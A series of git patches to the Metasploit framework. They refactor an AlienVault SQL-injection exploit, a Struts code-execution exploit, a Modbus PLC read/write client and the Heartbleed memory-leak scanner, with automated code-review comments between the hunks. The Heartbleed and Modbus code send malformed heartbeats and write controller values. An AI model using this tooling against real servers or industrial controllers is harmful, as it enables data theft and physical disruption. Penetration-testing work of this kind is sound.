generate_module_table("Matching Modules") framework.db.search_modules(search_string).each do |o| - tbl << [ o.fullname, o.disclosure_date.to_s, RankingName[o.rank].to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), RankingName[o.rank].to_s, o.name ] end print_line(tbl.to_s) end From 78cefae607d4d40deed44b93aa3db176fed11bee Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:07:26 -0500 Subject: [PATCH 219/853] Use WfsDelay --- .../linux/http/alienvault_sqli_exec.rb | 21 ++++++------------- 1 file changed, 6 insertions(+), 15 deletions(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 463a44530f..6a9e1eabb4 100644 
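Review bot: Replacing `o.disclosure_date.to_s` with `o.disclosure_date.strftime("%Y-%m-%d")` in the `@@ -1488,7` hunk removes the nil tolerance that `to_s` provided. If a module has no disclosure date, the search would now raise `NoMethodError` instead of printing an empty column. Whether `disclosure_date` can be nil is not visible in these hunks, but modules without a `'DisclosureDate'` entry make that likely. A guarded form keeps the new format without that risk: `o.disclosure_date.nil? ? "" : o.disclosure_date.strftime("%Y-%m-%d")`. The same change is needed in the `@@ -1503,7` hunk for `search_modules_sql`.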
--- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -32,7 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'SSL' => true + 'SSL' => true, + 'WfsDelay' => 10 }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -54,8 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(443), - OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), - OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 3 ]) + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) ], self.class) end @@ -261,22 +261,13 @@ class Metasploit3 < Msf::Exploit::Remote end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie - }) - - if res and res.code == 404 - print_status("#{peer} - Payload delivered") - wait = datastore['WAIT'].to_i - print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") - Rex.sleep(wait) - else - fail_with(Failure::Unknown, "#{peer} - Payload failed!") - end + }) end From 1b39712b73c16f57fabc604b33432f0774829d0d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:10:16 -0500 Subject: [PATCH 220/853] Redo response check --- modules/exploits/linux/http/alienvault_sqli_exec.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 6a9e1eabb4..502fa8126b 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb 
+++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -269,6 +269,12 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => @cookie }) + if res and res.code == 404 + print_status("#{peer} - Payload delivered") + else + fail_with(Failure::Unknown, "#{peer} - Payload failed!") + end + end From bd124c85cb2f9158da368f61b0dfd108a42fb898 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:52:55 -0500 Subject: [PATCH 221/853] Use metadata format for actions --- .../auxiliary/scanner/scada/modbusclient.rb | 36 +++++++++---------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index cc630539df..b19a847d62 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Modbus Client Utility', 'Description' => %q{ This module allows reading and writing data to a PLC using the Modbus protocol. - This module is based on the 'modiconstop.rb' Basecamp module from - DigitalBond, as well as the mbtget perl script. + This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond, + as well as the mbtget perl script. }, 'Author' => [ 
@@ -23,12 +23,15 @@ class Metasploit3 < Msf::Auxiliary 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, - 'Actions' => [AuxiliaryAction.new('READ_COIL', {'Description' => "Read one bit from a coil"}), - AuxiliaryAction.new('WRITE_COIL', {'Description' => "Write one bit to a coil"}), - AuxiliaryAction.new('READ_REGISTER', {'Description' => "Read one word from a register"}), - AuxiliaryAction.new('WRITE_REGISTER', {'Description' => "Write one word to a register"}) - ] + 'Actions' => + [ + ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], + ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], + ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], + ] )) + register_options( [ Opt::RPORT(502), @@ -48,8 +51,7 @@ class Metasploit3 < Msf::Auxiliary end def make_read_payload - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") @@ -60,12 +62,11 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def make_write_coil_payload(data) - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("c") @@ -77,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def make_write_register_payload(data) @@ -93,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def run 
@@ -104,13 +105,11 @@ class Metasploit3 < Msf::Auxiliary @function_code = 1 response = send_frame(make_read_payload) print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) - when "READ_REGISTER" @function_code = 3 response = send_frame(make_read_payload) value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) - when "WRITE_COIL" @function_code = 5 if datastore['DATA'] == 0 @@ -123,7 +122,6 @@ class Metasploit3 < Msf::Auxiliary end response = send_frame(make_write_coil_payload(data)) print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") - when "WRITE_REGISTER" @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 @@ -132,10 +130,10 @@ class Metasploit3 < Msf::Auxiliary end response = send_frame(make_write_register_payload(datastore['DATA'])) print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") - else print_error("Invalid ACTION") - return end + + disconnect end end \ No newline at end of file From 28e9057113361fa687f78a64725faabda63add27 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 10:23:33 -0500 Subject: [PATCH 222/853] Refactor make_payload --- .../auxiliary/scanner/scada/modbusclient.rb | 27 +++++++++---------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index b19a847d62..c8bef69703 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
@@ -50,17 +50,22 @@ class Metasploit3 < Msf::Auxiliary return r end + def make_payload(payload) + packet_data = [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload + + packet_data + end + def make_read_payload payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end @@ -72,11 +77,7 @@ class Metasploit3 < Msf::Auxiliary payload += [data].pack("c") payload += "\x00" - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end @@ -88,11 +89,7 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end From cc2e6807241516e3cf40d06348aed810477ebba2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 11:04:29 -0500 Subject: [PATCH 223/853] Refactor --- .../auxiliary/scanner/scada/modbusclient.rb | 90 ++++++++++++------- 1 file changed, 60 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index c8bef69703..ca6275a659 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
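Review bot: The `#dunno what these are` comment carried into the new `make_payload` leaves the frame header undocumented. In Modbus/TCP the two bytes after the transaction id are the protocol identifier (0) and the next two are a big-endian length, so the three zero bytes plus the `size byte` are really two 16-bit fields. Writing them as `packet_data += [0, payload.size].pack("nn") # protocol id, length of unit id + PDU` gives the same bytes for payloads under 256 bytes and no longer truncates the length to one byte. The three callers can then end with `make_payload(payload)` instead of assigning `packet_data` and returning it on the next line.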
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary def send_frame(payload) sock.put(payload) @modbus_counter += 1 - r = sock.get + r = sock.get(sock.def_read_timeout) return r end @@ -82,9 +82,8 @@ class Metasploit3 < Msf::Auxiliary packet_data end - def make_write_register_payload(data) - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + def make_write_register_payload(data) + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") 
@@ -94,43 +93,74 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def read_coil + @function_code = 1 + response = send_frame(make_read_payload) + if response.nil? + print_error("No answer for the READ COIL") + return + end + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) + end + + def read_register + @function_code = 3 + response = send_frame(make_read_payload) + if response.nil? + print_error("No answer for the READ REGISTER") + return + end + value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') + print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + end + + def write_coil + @function_code = 5 + if datastore['DATA'] == 0 + data = 0 + elsif datastore['DATA'] == 1 + data = 255 + else + print_error("Data value must be 0 or 1 in WRITE_COIL mode") + return + end + response = send_frame(make_write_coil_payload(data)) + if response.nil? + print_error("No answer for the WRITE COIL") + return + end + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") + end + + def write_register + @function_code = 6 + if datastore['DATA'] < 0 || datastore['DATA'] > 65535 + print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") + return + end + response = send_frame(make_write_register_payload(datastore['DATA'])) + if response.nil? 
+ print_error("No answer for the WRITE REGISTER") + return + end + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + end + def run @modbus_counter = 0x0000 # used for modbus frames connect case datastore['ACTION'] when "READ_COIL" - @function_code = 1 - response = send_frame(make_read_payload) - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) + read_coil when "READ_REGISTER" - @function_code = 3 - response = send_frame(make_read_payload) - value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') - print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + read_register when "WRITE_COIL" - @function_code = 5 - if datastore['DATA'] == 0 - data = 0 - elsif datastore['DATA'] == 1 - data = 255 - else - print_error("Data value must be 0 or 1 in WRITE_COIL mode") - exit - end - response = send_frame(make_write_coil_payload(data)) - print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") + write_coil when "WRITE_REGISTER" - @function_code = 6 - if datastore['DATA'] < 0 || datastore['DATA'] > 65535 - print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") - exit - end - response = send_frame(make_write_register_payload(datastore['DATA'])) - print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + write_register else print_error("Invalid ACTION") end - disconnect end end \ No newline at end of file From d3045814a20b01f9baf97fe573d8077c84793e91 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 11:05:55 -0500 Subject: [PATCH 224/853] Add print_status messages --- modules/auxiliary/scanner/scada/modbusclient.rb | 4 ++++ 1 file changed, 4 insertions(+) 
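Review bot: `read_register` parses the reply with `response.split[0][9..10]`, and `String#split` with no argument cuts binary data at any whitespace byte. A reply with a 0x20, 0x09 or 0x0A byte in its first eleven bytes therefore gives a shortened slice and a wrong or empty value, and an empty reply raises on `nil`. Index the string directly after a length check: `return print_error("Short READ REGISTER reply") if response.length < 11`, then `value = response[9, 2].unpack("n").first.to_s`. `read_coil` has a related weakness in `response.reverse.unpack("c")`, which takes the last byte of whatever arrived without checking the reply length.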
diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index ca6275a659..43e7cd99a4 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -95,6 +95,7 @@ class Metasploit3 < Msf::Auxiliary def read_coil @function_code = 1 + print_status("Sending READ COIL...") response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ COIL") @@ -105,6 +106,7 @@ class Metasploit3 < Msf::Auxiliary def read_register @function_code = 3 + print_status("Sending READ REGISTER...") response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ REGISTER") @@ -124,6 +126,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data value must be 0 or 1 in WRITE_COIL mode") return end + print_status("Sending WRITE COIL...") response = send_frame(make_write_coil_payload(data)) if response.nil? print_error("No answer for the WRITE COIL") @@ -138,6 +141,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") return end + print_status("Sending WRITE REGISTER...") response = send_frame(make_write_register_payload(datastore['DATA'])) if response.nil? print_error("No answer for the WRITE REGISTER") From 3374af83abef23c17eb1c1be33146705c5a3b0f6 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 19:44:07 +0200 Subject: [PATCH 225/853] Fix typos --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 4bae6dd8ef..e75cecbf60 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb 
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'w' + 'Platform' => 'win' } ], ['Linux Universal', @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'linux' } ], - [ 'Java Universal', + ['Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => ['win','linux'] From e0ee31b388fa268e63b8389f330a36ce722c9a58 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 20:19:31 +0200 Subject: [PATCH 226/853] Modify print_error by fail_with --- .../http/struts_code_exec_classloader.rb | 25 ++++++------------- 1 file changed, 8 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index e75cecbf60..ad279627f4 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -118,11 +118,10 @@ class Metasploit3 < Msf::Exploit::Remote # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") res = exec_cmd(uri) + # Failure. The request timed out or the server went away. - if res.nil? - print_error("#{peer} - Not received response") - return - end + fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") @@ -131,11 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - unless created - print_error("#{peer} - No log file was created") - return - end - + fail_with(Failure::TimeoutExpired, "No log file was created") unless created if target['Arch'] == ARCH_JAVA payload_exe = payload.encoded 
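Review bot: The `fail_with` calls introduced in the -118 and -131 hunks drop the `#{peer} - ` prefix that the replaced `print_error` lines carried, so the failure text no longer names the host; the same applies to the -182 and -194 hunks of this file. Keeping the prefix, e.g. `fail_with(Failure::TimeoutExpired, "#{peer} - No response received") if res.nil?`, matches the `vprint_status` and `vprint_good` messages around them. `Failure::TimeoutExpired` for "No log file was created" and "Log not flushed on time" also reads as a network timeout. If the cause may be the server never writing the file, `Failure::Unknown` describes it more honestly. The enclosing method starts and ends outside these hunks.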
@@ -182,11 +177,10 @@ class Metasploit3 < Msf::Exploit::Remote # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") res = exec_cmd(uri) + # Failure. The request timed out or the server went away. - if res.nil? - print_error("#{peer} - Not received response") - return - end + fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && is_log_flushed(res, payload_file) flushed = true @@ -194,10 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - unless flushed - print_error("#{peer} - Log not flushed on time") - return - end + fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) From f7d8a5e3a39a4e0816c83e3a66a2b195f79b4ff2 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 1 May 2014 21:43:58 +0200 Subject: [PATCH 227/853] rework the openssl_heartbleed module --- .../scanner/ssl/openssl_heartbleed.rb | 514 +++++++++++++----- 1 file changed, 369 insertions(+), 145 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 3cca563d4b..4109ff847d 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -3,6 +3,12 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests. +# We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300 +# but there were too many errors +# TODO: Parse the rest of the server responses and return a hash with the data +# TODO: Extract the relevant functions and include them in the framework + require 'msf/core' class Metasploit3 < Msf::Auxiliary 
@@ -65,9 +71,15 @@ class Metasploit3 < Msf::Auxiliary 0x00ff # Unknown ] - HANDSHAKE_RECORD_TYPE = 0x16 - HEARTBEAT_RECORD_TYPE = 0x18 - ALERT_RECORD_TYPE = 0x15 + HANDSHAKE_RECORD_TYPE = 0x16 + HEARTBEAT_RECORD_TYPE = 0x18 + ALERT_RECORD_TYPE = 0x15 + HANDSHAKE_SERVER_HELLO_TYPE = 0x02 + HANDSHAKE_CERTIFICATE_TYPE = 0x0b + HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c + HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e + + TLS_VERSION = { 'SSLv3' => 0x0300, '1.0' => 0x0301, @@ -141,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(443), OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), - OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]), + OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]), OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]) @@ -150,11 +162,20 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options( [ OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]), - OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ]) + OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost']) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + + # + # Main methods + # + + # Called when using check def check_host(ip) @check_only = true vprint_status "#{peer} - Checking for Heartbleed exposure" 
@@ -165,20 +186,48 @@ class Metasploit3 < Msf::Auxiliary end end + # Main method def run if heartbeat_length > 65535 || heartbeat_length < 0 - print_error("HEARTBEAT_LENGTH should be a natural number less than 65536") + print_error('HEARTBEAT_LENGTH should be a natural number less than 65536') return end if response_timeout < 0 - print_error("RESPONSE_TIMEOUT should be bigger than 0") + print_error('RESPONSE_TIMEOUT should be bigger than 0') return end super end + # Main method + def run_host(ip) + # initial connect to get public key and stuff + connect_result = establish_connect + disconnect + return if connect_result.nil? + + case action.name + when 'SCAN' + loot_and_report(bleed) + when 'DUMP' + loot_and_report(bleed) # Scan & Dump are similar, scan() records results + when 'KEYS' + getkeys + else + #Shouldn't get here, since Action is Enum + print_error("Unknown Action: #{action.name}") + end + + # ensure all connections are closed + disconnect + end + + # + # DATASTORE values + # + # If this is merely a check, set to the RFC-defined # maximum padding length of 2^14. See: # https://tools.ietf.org/html/rfc6520#section-4 
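Review bot: In `run`, the guard `if response_timeout < 0` lets 0 through although its message says RESPONSE_TIMEOUT "should be bigger than 0". With a zero timeout the reads in this module would presumably return at once and the host would be reported as not answering. Either reject zero as well with `if response_timeout <= 0`, or reword the message to say the value must not be negative. In `run_host`, the comment `# initial connect to get public key and stuff` could state what is kept from that first connection, since `connect_result` is only tested for nil there.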
@@ -187,53 +236,77 @@ class Metasploit3 < Msf::Auxiliary if @check_only SAFE_CHECK_MAX_RECORD_LENGTH else - datastore["HEARTBEAT_LENGTH"] + datastore['HEARTBEAT_LENGTH'] end end - def peer - "#{rhost}:#{rport}" - end - def response_timeout datastore['RESPONSE_TIMEOUT'] end + def tls_version + datastore['TLS_VERSION'] + end + + def dumpfilter + datastore['DUMPFILTER'] + end + + def max_keytries + datastore['MAX_KEYTRIES'] + end + + def xmpp_domain + datastore['XMPPDOMAIN'] + end + + def status_every + datastore['STATUS_EVERY'] + end + + def tls_callback + datastore['TLS_CALLBACK'] + end + + # + # TLS Callbacks + # + def tls_smtp # https://tools.ietf.org/html/rfc3207 - sock.get_once(-1, response_timeout) + get_data sock.put("EHLO #{Rex::Text.rand_text_alpha(10)}\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data unless res && res =~ /STARTTLS/ return nil end sock.put("STARTTLS\r\n") - sock.get_once(-1, response_timeout) + get_data end def tls_imap # http://tools.ietf.org/html/rfc2595 - sock.get_once(-1, response_timeout) + get_data sock.put("a001 CAPABILITY\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data unless res && res =~ /STARTTLS/i return nil end sock.put("a002 STARTTLS\r\n") - sock.get_once(-1, response_timeout) + get_data end def tls_postgres # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html - sock.get_once - # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + get_data + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), # int16(5679) in network format psql_sslrequest = [8].pack('N') psql_sslrequest << [1234, 5679].pack('n*') sock.put(psql_sslrequest) - res = sock.get_once + res = get_data unless res && res =~ /S/ return nil end 
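Review bot: In `tls_postgres` the acceptance test `res =~ /S/` matches an "S" anywhere in the reply, not only the single-byte "S" a server sends to accept an SSLRequest. An error reply that merely contains that letter would be read as acceptance, and the Client Hello would then be sent into a session that never switched to TLS. `unless res && res.start_with?('S')` is the tighter check. The end of `tls_postgres` lies outside this hunk.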
@@ -242,14 +315,14 @@ class Metasploit3 < Msf::Auxiliary def tls_pop3 # http://tools.ietf.org/html/rfc2595 - sock.get_once(-1, response_timeout) + get_data sock.put("CAPA\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data if res.nil? || res =~ /^-/ || res !~ /STLS/ return nil end sock.put("STLS\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data if res.nil? || res =~ /^-/ return nil end @@ -265,13 +338,13 @@ class Metasploit3 < Msf::Auxiliary end def tls_jabber - sock.put(jabber_connect_msg(datastore['XMPPDOMAIN'])) + sock.put(jabber_connect_msg(xmpp_domain)) res = sock.get(response_timeout) if res && res.include?('host-unknown') jabber_host = res.match(/ from='([\w.]*)' /) if jabber_host && jabber_host[1] disconnect - connect + establish_connect vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = sock.get(response_timeout) @@ -293,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get(response_timeout) return nil if res.nil? sock.put("AUTH TLS\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data return nil if res.nil? if res !~ /^234/ # res contains the error message 
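Review bot: In `tls_jabber`, replacing `connect` with `establish_connect` makes the callback re-enter itself. `establish_connect` runs the configured TLS callback right after connecting, which is `tls_jabber` again with the same XMPPDOMAIN (assuming `TLS_CALLBACKS` maps JABBER to this method). It also sends a Client Hello before the outer call has opened the stream for the autodetected hostname. A server that keeps answering host-unknown would drive this into unbounded recursion. The reconnect at this point only needs a fresh socket, so the line should stay `connect`. The method continues beyond the hunk.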
@@ -303,31 +376,83 @@ class Metasploit3 < Msf::Auxiliary res end - def run_host(ip) - case action.name - when 'SCAN' - loot_and_report(bleed) - when 'DUMP' - loot_and_report(bleed) # Scan & Dump are similar, scan() records results - when 'KEYS' - getkeys() - else - #Shouldn't get here, since Action is Enum - print_error("Unknown Action: #{action.name}") - return + # + # Helper Methods + # + + # Get data from the socket + # this ensures the requested length is read (if available) + def get_data(length = -1) + + return sock.get_once(-1, response_timeout) if length == -1 + + to_receive = length + data = '' + while to_receive > 0 + temp = sock.get_once(to_receive, response_timeout) + break if temp.nil? + + data << temp + to_receive -= temp.length end + data end + def to_hex_string(data) + data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip + end + + # establishes a connect and parses the server response + def establish_connect + connect + + unless tls_callback == 'None' + vprint_status("#{peer} - Trying to start SSL via #{tls_callback}") + res = self.send(TLS_CALLBACKS[tls_callback]) + if res.nil? + vprint_error("#{peer} - STARTTLS failed...") + return nil + end + end + + vprint_status("#{peer} - Sending Client Hello...") + sock.put(client_hello) + + server_hello = sock.get(response_timeout) + unless server_hello + vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + return nil + end + + server_resp_parsed = parse_ssl_record(server_hello) + + if server_resp_parsed.nil? 
+ vprint_error("#{peer} - Server Hello Not Found") + return nil + end + + server_resp_parsed + end + + # Generates a heartbeat request + def heartbeat_request(length) + payload = "\x01" # Heartbeat Message Type: Request (1) + payload << [length].pack('n') # Payload Length: 65535 + + ssl_record(HEARTBEAT_RECORD_TYPE, payload) + end + + # Generates, sends and receives a heartbeat message def bleed - # This actually performs the heartbleed portion connect_result = establish_connect return if connect_result.nil? vprint_status("#{peer} - Sending Heartbeat...") - sock.put(heartbeat(heartbeat_length)) - hdr = sock.get_once(5, response_timeout) - if hdr.blank? + sock.put(heartbeat_request(heartbeat_length)) + hdr = get_data(5) + if hdr.nil? || hdr.empty? vprint_error("#{peer} - No Heartbeat response...") + disconnect return end 
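Review bot: `establish_connect` rejects the server reply only when `parse_ssl_record` returns nil, but that parser returns an empty array when the reply holds no handshake record (an alert, for example). Such a reply now passes where the removed `server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE` test rejected it. `if server_resp_parsed.nil? || server_resp_parsed.empty?` restores that behaviour. The failure returns in `establish_connect` and the `return if connect_result.nil?` in `bleed` also leave the socket open, while the no-heartbeat path in the same hunk now calls `disconnect`. Calling `disconnect` on those paths too would keep cleanup consistent.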
